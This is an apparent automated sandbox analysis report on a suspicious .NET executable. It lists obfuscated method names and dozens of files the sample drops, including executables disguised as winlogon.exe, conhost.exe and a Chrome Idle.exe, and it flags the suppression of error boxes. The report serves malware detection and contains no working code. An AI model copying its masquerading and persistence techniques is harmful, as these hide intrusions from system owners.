                              Source: 150bIjWiGH.exe, Dh33T9VvLYLf94UQ9AR.csHigh entropy of concatenated method names: 'hEEZ7cHsDhwaM3InhLfR', 'ih0ZXiHsmceCEIAgqLdW', 'miD25uHsE914Ccdg1Yy8', 'HKiMytHsM44Xs0sG6Sv3', 'SyHGiXHsJeUpIk2P0SxQ', 'MrGFc2Hs3RP6Qc9KDqq6', 'P9KoenHs597UkmnXqoFr', 'kBBm40Hsdx6GljU7W5sg'
                              Source: 150bIjWiGH.exe, rdBYACY335wpLuOuTFx.csHigh entropy of concatenated method names: 'bjtYEH9J0I', 'C0TYM4gBat', 'GTJYDQk5xH', 'CULYmCSD9M', 'l6XY0Fbnqw', 'S5Bn8gHDoWvO140KHYt3', 'mAKTj0HDAufiP8pbtEt2', 'vLis0eHDnVII3oHhBLcY', 'sw5rCOHDFovdeI5PDwRX', 'AARBkBHDvxyu31b0W9WO'
                              Source: 150bIjWiGH.exe, YPWYI9HwsJEINU58jeM.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'WkvHLHoFIq8', 'vTDHpHK1kwq', 't6RlXkHewdAf36uMPyWK', 'Yi9OAyHezsn7Xtc3vgvp', 'cLtImqHQOF4GOZOT6ym6', 'zWvvdgHQHk5HiXEhhl5W'
                              Source: 150bIjWiGH.exe, EPMspVynH2B4gDu0Umb.csHigh entropy of concatenated method names: 'W3Fy1darGk', 'SnGyEg4Xwc', 'jYCyMG5Q7I', 'oo9bkIHVWqk3qaMAKPfE', 'DZBgS7HVBpuVsnZSmjEU', 'wRHFclHVgVKxkbM0Wgiy', 'BeUiwlHVjqYvPJYHbZnc', 'xKWyVTjMhS', 'Wv2y5XFJIK', 'cEwydt1XDa'
                              Source: 150bIjWiGH.exe, Mx5jrE9Dv7HWFBNG5m.csHigh entropy of concatenated method names: 'iJnFQioWi', 'SS9UqAHISt9h90WMgABl', 'yub83rHIYc17WlbQ4YnT', 'CWoRWZHIexoNIRwIlqBa', 'tlTbycHIQ2Vj47lsxcTl', 'hloyayxTQ', 'koFCOfGIu', 'qMck3lMqo', 'TJdKASW9M', 'VajGWpJ99'
                              Source: 150bIjWiGH.exe, plL30BWGnoj9CjpuNR7.csHigh entropy of concatenated method names: 'fc5ygQxRiZ', 'preyjew2J7', 'f7qSGwH41vNQMJ5KolYk', 'RfNc4GH4JRlNnn5hLRev', 'vvPxSMH43hWTDnIjGWrj', 'BQgLoNH4EKCa5BtSmcHQ', 'IdsniNH4MnvyNhpte1uL', 'DUlyyTtx47', 'gNH9ClH4m68GJ1XHBj3t', 'zfB842H40HkET3Kp9nQR'
                              Source: 150bIjWiGH.exe, UOGrmKFmIYuJHObVGSI.csHigh entropy of concatenated method names: 'zHVlKcHcOrtdOvHJXf2T', 'lMD5JWH0w3rUotVL9xSS', 'Ywx6rDH0zXTl2DiKcti5', 'iddFc6MF1Y', 'Mh9', 'method_0', 'bllFhGhkUi', 'yijFsvBBs5', 'kovFtoQyns', 'iPVFuMdiVj'
                              Source: 150bIjWiGH.exe, Tqt5M2NyePVGYZYlZS5.csHigh entropy of concatenated method names: 'FwvNQmC1gR', 'BZwdD9Hfdi3xWgSArrhh', 'VFxQlTHfJYIwalSUBYhF', 'R25iMFHfV2OeDxOTRV9U', 'JbNPINHf5Sjv4RM7LKBp', 'RKFEUcHf3jfDaGM7xOSJ', 'VgfNkDoQwd', 'jxINK0nAyc', 'PYyNGtP9n6', 'buONPrwpOg'
                              Source: 150bIjWiGH.exe, iSjaOLLKPfRDewOasZn.csHigh entropy of concatenated method names: 'CATLPV9g6r', 'EYrCK0HFVCGvJdvRqIHM', 'js9EbxHF5d7xP5ca4tuR', 'bQ6uh5HFdcWhV7gp9dFV', 'D72iSpHFJttrAgMjeeDS', 'rqCKiyHFnk1VUiih4nJ4', 'WVAhHyHF4sHT9qcGkQXR', 'I3LIW1HF39oWAIanWVgN'
                              Source: 150bIjWiGH.exe, mJ7igxxm23x2OUDOWNG.csHigh entropy of concatenated method names: 'D84pxN13tJ', 'pFpppTKEyZ', 'SE2pa8gfUg', 'XhT2esHSwY5kwREysjBq', 'A6egl5HSi1JCZwvMccP8', 'GShLYLHSbh2nb9jQkegb', 'fGsplPfeBN', 'EwmF8EHY2TLrSGsNB0qC', 'O4RMVLHYOSM9k1it6Yq4', 'D3RrW3HYHGtpLpunqlEI'
                              Source: 150bIjWiGH.exe, OWJKhnpyowAphB6akvt.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'L3I', 'MvjHL2mdoZy', 'vTDHpHK1kwq', 'CcbIfZHYjHK17TEnICPa', 'nQXX97HYWDo58qtTbhQN', 'tp3U9EHYBkN05m0n22Uc', 'yj3roxHYro88oTJehEr3', 'wDU4UlHY9VfGKSBB3mAR'
                              Source: 150bIjWiGH.exe, hwblA2kBDSZW2uY75W5.csHigh entropy of concatenated method names: 'S5oZidHdg642PPck2f05', 'kRg18gHdj16eILJF60iD', 'yKtBrrHdWSrPK9Degxt0', 'shxpPhHdlMWavr2Y4vgl', 'P7Wl0OHdqcxHklOEJjYS', 'method_0', 'method_1', 'z1Zk90nPgB', 'BoxkTVd5Hm', 'mw9kyU7rBO'
                              Source: 150bIjWiGH.exe, cruYcl4urNHsj18q3kx.csHigh entropy of concatenated method names: 'qcQ4b8i0kj', 'BlW4wTE9sg', 'K5J4zTZBM0', 'pYDVOn3ymR', 'yN4VHPs39r', 'pIyV28uxH0', 'WilVxjUnlN', 'oCTVpxF7yi', 'uTjVauOVxq', 'xPpVUcA59P'
                              Source: 150bIjWiGH.exe, exM9PHhAxTpBcUDmy1B.csHigh entropy of concatenated method names: 'C39HLImqe39', 'cdQHU69BTtp', 'I22UK8HulaL4u511Wt65', 'o90AtQHu8fQk1CIJ97kZ', 'dLGGjZHuRQo3rKJGUkFd', 'Nx7QbQHuqPC01SvoMo7P', 'GXiWicHuBlV5AHjuU0mZ', 'XqO7MgHujyNwvhVgwLOk', 'I3D8GtHuWTAMd7TGAb8r', 'imethod_0'
                              Source: 150bIjWiGH.exe, PO3HXuLetEHg8PHtv52.csHigh entropy of concatenated method names: 'YALLSV1Xv7', 'o4ULYyByDY', 'mgaLZSGkSP', 'Up1L7ydb16', 'KblLfArb4t', 'Nh9LFSGnLe', 'MHhmTBHFc181fT548mKb', 'hcOcmOHFhYS3IaMvmkE8', 'ewBEHUHFsRkGWiqkuO0I', 'iqq800HFtnTGduiMMFMZ'
                              Source: 150bIjWiGH.exe, s5wkfYb46Eorf0no8kh.csHigh entropy of concatenated method names: 'w1aHU7e9P6J', 'PKQHUfkJwXu', 'OSDHUF1usDM', 'BPnHUvHi9ZQ', 'QITHUoB4Yls', 'Dd5HUA0OSg1', 'SXLHUnHW1IA', 'zYqwaj8gPJ', 'tktHU4sFoKe', 'MaeHUVMx9EG'
                              Source: 150bIjWiGH.exe, Dufp9HfvTfgH65WwmsD.csHigh entropy of concatenated method names: 'Close', 'qL6', 'aR5fAy5oOa', 'gMwfnoagJZ', 'GFgf49rtu9', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                              Source: 150bIjWiGH.exe, kgrkpms74mdnP6fu234.csHigh entropy of concatenated method names: 'jZNsFNGJSb', 'CmIsvGhuOl', 'yQ1soPqHi1', 'x9msAbxqsy', 'RY1sn57bKp', 'LJKs4CEl9g', 'L4QsV0XWDl', 'ONys5NRaUE', 'jPGsdN9G1K', 'VtksJNqGiC'
                              Source: 150bIjWiGH.exe, RsmSbr6PgpqK6du6OuZ.csHigh entropy of concatenated method names: 'nwi66iILkM', 'zlZ6IqZhE5', 'Nmb6ea2OBN', 'kKx6QPrrHo', 'b7f6S2cWcF', 'FineDxH3dgKih6VI7cej', 'axEulTH3VNQykDSmqdDb', 'o7YUuyH35EGE7c0lKly4', 'zacL6RH3JtxmFOTIwVD4', 'HkXfbpH33XjrGhubpoeM'
                              Source: 150bIjWiGH.exe, sthVylNZxK2pLlk4lwj.csHigh entropy of concatenated method names: 'tw4NfSVgee', 'AD2NFekNQZ', 'CukPJxHfDoQgHwqYXgOn', 'jZ2lAeHfEnK3DTrdneAA', 'WQ02maHfMdyyy9tgTvBw', 'UZxHeEHfm0iube2ULAeR', 'inxBFcHf0s3Yrasbq0eP', 'Rehe70Hfcy5clloy8JP2', 'TgOfSBHfhavX211PqYSK', 'cHk7h9Hfs0sIqtsTKBHw'
                              Source: 150bIjWiGH.exe, xX0DqmN5PgvUGXw20Er.csHigh entropy of concatenated method names: 'fugNtjStTP', 'Ar6NuQJqfF', 'qIh4otHFLRlwYDrT4Ube', 'O9br6QHFUUAFd3XB14FW', 'XIv0QHHFNJGYFDM9ZCdv', 'bA2eOpHF8K6j3cueuLrd', 'VdlNJ5c3Nb', 'O58N3JFDbr', 'jq5N1dxKrC', 'OC0NE9JpC7'
                              Source: 150bIjWiGH.exe, nTOR0QkaCsrPIbuxsDc.csHigh entropy of concatenated method names: 'method_0', 'method_1', 'K47', 'PGAkNAdqhk', 'vmethod_0', 'eUdkL6ThB8', 'vfPHLkWhTqO', 'dBjlTiH5MN6wUWuaGP56', 'iLR5c4H51U0NBkL3TBH8', 'u5j5YQH5EgYrSqJ87cVI'
                              Source: 150bIjWiGH.exe, J7EMJcXJsUD5YajAk9q.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'AV4X1ejO3U', 'oBqXEF738P', 'Dispose', 'D31', 'wNK'
                              Source: 150bIjWiGH.exe, DmcWucu9ZjDuseHj6np.csHigh entropy of concatenated method names: 'PTW4itHbNuyXq4tcvXy7', 'JNq7m7HbL4jtJZ6fh4ON', 'dQ5ihAFoT0', 't0DjYNHbqSlTpG699GkB', 'egQMCdHbgEHkvPL2phYX', 'p0gmYOHbjZr4D8W3og5T', 'fea3LTHbWWMyu5TYHL7Q', 'Wu8VcjHbBiZkmpFHtFaW', 'yI7HgeHbr0AKFPqfihHa', 'UG9bi1Hb9RykODdjek5y'
                              Source: 150bIjWiGH.exe, rGismKhZyjVWHY5iK6X.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'KIFhfyGnYn', 'pxxXjDHtnppyinhIcGt3', 'EflUVyHt4iIxGkMKtsTd', 'RZgr7VHtV6pSTfpj7KZk', 'Lu1ukiHt5yJ4VGGIV5Md', 'I3ubvAHtdFuceol6ifAs', 'Tj7VEtHtJFS9YlouuCL1'
                              Source: 150bIjWiGH.exe, rIKPuHLR4LueBjO981D.csHigh entropy of concatenated method names: 'G1gLq5ZhOR', 'eddLgLkex0', 'hOPLjjG9V6', 'sr8adiHFku5nHuTZPob7', 'hUWQwdHFKFkMmFlx2hfs', 'XMFjSGHFyoKtQ9K8rZOr', 'seHCJ5HFCsqD4kvnHZnd', 'BPHhX6HFGvwIDs5ssaWE', 'mhqqqfHFPfckkb4bNBAV', 'F1ipt5HFXonmvJXLUCcC'
                              Source: 150bIjWiGH.exe, Kt11kWQ1dPLgCREHBEB.csHigh entropy of concatenated method names: 'E6DQMADBuH', 'hMYQDG8ZEb', 'W4ZQmKaPQh', 'PprnYUHEQYvDVSAgbGrc', 'NMsUOeHEIqkrZNwd16LU', 'jwajGeHEeLLuKwxnwQSU', 'fYTIVvHESefXRUWN7Ooa', 'v9CnwAHEYaamFV5UD3R0', 'TFkAPFHEZhluwnmvC4mS', 'bH3dgXHE7rqLy215SdNE'
                              Source: 150bIjWiGH.exe, psy1bBIZElcggbr41E5.csHigh entropy of concatenated method names: 'method_0', 'qJfIfvOqTl', 'PNHIFLR4tF', 'ltPIvVLGu4', 'p4YIoRupJl', 'gkQIAkZKIj', 'gVBInWugUs', 'nTGdtMH1qjFt1I8BXTdi', 'h6CSkRH1RIryE033tECy', 'm6FsEbH1llaBFd1EJq0B'
                              Source: 150bIjWiGH.exe, YHuhCiNHMNDYMeQoCCZ.csHigh entropy of concatenated method names: 'q68NxmQWOg', 'DdMNppL4e4', 'TT6NabDwOH', 'lJtw4YHfpw1Z3xOSL6WL', 'vv73NRHf2ZdGZhbPGjq9', 'Pub81wHfxecw9tOJIjQr', 'BZXoyqHfaCWwQJLNLTrl', 'NpvUqCHfUv5oIJaL1sIn', 'JxMksaHfN2EtMZTIKJAA', 'Hry4sAHfLaL3Voy3UYhC'
                              Source: 150bIjWiGH.exe, ynpGilbj8SbgalVBhPU.csHigh entropy of concatenated method names: 'XG22aoS2MnA', 'Kwq2aASGcpx', 'SIpH72HbnvXmaVRiYPcY', 'ljpbToHb4NP8mrClq9tk', 'tdhoEsHbVJ1qdPOxQxfx', 'wBXf35Hb5NWOtgfTouJM', 'TWtUKHHbdhmdB73saj7S'
                              Source: 150bIjWiGH.exe, juNZZxQcFPpOBx5B0U2.csHigh entropy of concatenated method names: 'e39QsYM76k', 'JhPQtaTrcB', 'aXwQuxRW27', 'K42QitCiuf', 'qZ5QbNo626', 'gRZ5jIHEormgKKXL5UlZ', 'rEpyYGHEFJ9FZdShLLfK', 'uiUR1NHEvagixTkfCFnw', 'zodRiXHEAwn5Lm8ofNgg', 'svrFpDHEnOLtxhBV1rNW'
                              Source: 150bIjWiGH.exe, i2sOyqYp2qn1NJDci8x.csHigh entropy of concatenated method names: 'RBZYUQdSxM', 'HqxYN6DqAE', 'kZQYLAZrsG', 'method_0', 'method_1', 'Fc2', 'method_2', 'method_3', 'DB1', 'YHLY8Jc9xc'
                              Source: 150bIjWiGH.exe, ewrnHVz2Em3gnCIihE.csHigh entropy of concatenated method names: 'gbwHHMfCuX', 'mmJHxAoWHD', 'kg0HpeXjvb', 'kMCHafAtFS', 'zktHU38GQD', 'ea8HNUNyWr', 'Ak9H83bKBS', 'VBYZs3HeaAvcBBBkG3wt', 'TnI1g8HeUcyihRdaGVkR', 'F2f4PXHeNtumTsjkfWgq'
                              Source: 150bIjWiGH.exe, HFBlwGp78PJYe8NpwYr.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'KyvHLp4ZGvQ', 'vTDHpHK1kwq', 'dXAx5wHYQ7VnG1Z9jyGf', 'msUsbFHYS22ls24QO9d8', 'DdxRpdHYYP0bPiQDlFqG', 'eatr0cHYZvi9Iql82bXD', 'Y0QoEhHY7jUoqS3CFi4I'
                              Source: 150bIjWiGH.exe, FjMrhDaJ76Hv2OSGsdQ.csHigh entropy of concatenated method names: 'wE2aDjqaRg', 'HX6NnxHZb87PYH0lJ8UW', 'OHWVWyHZusP7Wh63NLQK', 'Yx09BiHZivi2jfIUmAfn', 'oRGmTkHZw9IiylGDmIRB', 'e031dmHZz643t9ki9bqw', 'U1J', 'P9X', 'QInHpBAOZGN', 'YNyHpr8VFE7'
                              Source: 150bIjWiGH.exe, jyV9ajnZDpTImApmy8G.csHigh entropy of concatenated method names: 'FgonfKL5CH', 'PlDnFchU0R', 'vOZnvVO11S', 'WHXnoCAs9j', 'J9VnAAUHaw', 'HHRnn0JLD6', 'Ffnn4xL8Yg', 'lYJnVXjjpS', 'lnMn5EDcCG', 'XaRndG3TGd'
                              Source: 150bIjWiGH.exe, ExmtqdxIe3trnYjckgJ.csHigh entropy of concatenated method names: 'dCfxd8XNNB', 'TrexJDDwui', 'Oxax3NZ3w2', 'kfoPVbHS4DEZGYrXy4Ii', 'qTqOhIHSVBuux88GH3rR', 'GvYku7HSAuIPfGcYK7Fh', 'KCB0r0HSnVWDZHX8PyIN', 'uS5xQ9QBZc', 'fZExSlpVde', 'PN0xYoJQpA'
                              Source: 150bIjWiGH.exe, VtM5fEovIO5FhpxvvtY.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'Pib0UdHcIqUWes9IOD87', 'lre4OKHcXa9f1ehGgg1Y', 'V27cbOHc6NCD3KgE09l1'
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\jafJbNin.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\vUJHQLLN.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\INSOfWoM.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\aauTzsJb.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\trhzTxUr.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\mrAShSvf.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exeJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\ZAjtbXwC.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\OmvnkQVc.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\lcSrxwmi.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\imbBpzmp.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\HwrGmkBt.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\pfYQxwkv.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Program Files\Google\Chrome\Application\Idle.exeJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\taahEcao.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\BDOgJEwE.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\krGRUzVH.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\NjdutxKy.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\ctybNUhB.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\gJztsmvT.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Recovery\winlogon.exeJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\fBwkimbw.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\sSWZvcGR.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\YDIlGXhH.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\CBqofELz.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\JBWWRkkK.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\rhLyTfpq.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\saGrZLhX.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Recovery\KcduafKotlNaKVM.exeJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\pekirssD.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\qhrIoOvZ.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\wINPCZGL.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\WagdIJql.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\aInBkXPZ.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\mutAqiZC.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\yVbyLHQi.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\ItSOHkQo.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\EOEXonVW.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\ftMSEDAr.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\JtmEmBJF.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Recovery\conhost.exeJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\xiXqauUk.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\UhRuWMEn.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\FInxAXGv.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\zTDGhHfd.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\NsNNYhlE.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\NpUfPQGh.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\SLfLdrcT.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\XXHldJFg.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\zTDGhHfd.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\pfYQxwkv.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\XXHldJFg.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\NjdutxKy.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\xiXqauUk.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\mutAqiZC.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\UhRuWMEn.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\JtmEmBJF.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\trhzTxUr.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\rhLyTfpq.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\pekirssD.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\yVbyLHQi.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\gJztsmvT.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\WagdIJql.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\NsNNYhlE.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\EOEXonVW.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\taahEcao.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\krGRUzVH.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\aInBkXPZ.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\JBWWRkkK.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\aauTzsJb.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\INSOfWoM.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\ctybNUhB.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\SLfLdrcT.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\BDOgJEwE.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\saGrZLhX.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\imbBpzmp.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\YDIlGXhH.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\HwrGmkBt.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\wINPCZGL.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\fBwkimbw.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\NpUfPQGh.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\CBqofELz.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\sSWZvcGR.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\ZAjtbXwC.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\ItSOHkQo.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\qhrIoOvZ.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\ftMSEDAr.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\OmvnkQVc.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\FInxAXGv.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\vUJHQLLN.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\mrAShSvf.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\jafJbNin.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile created: C:\Users\user\Desktop\lcSrxwmi.logJump to dropped file
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
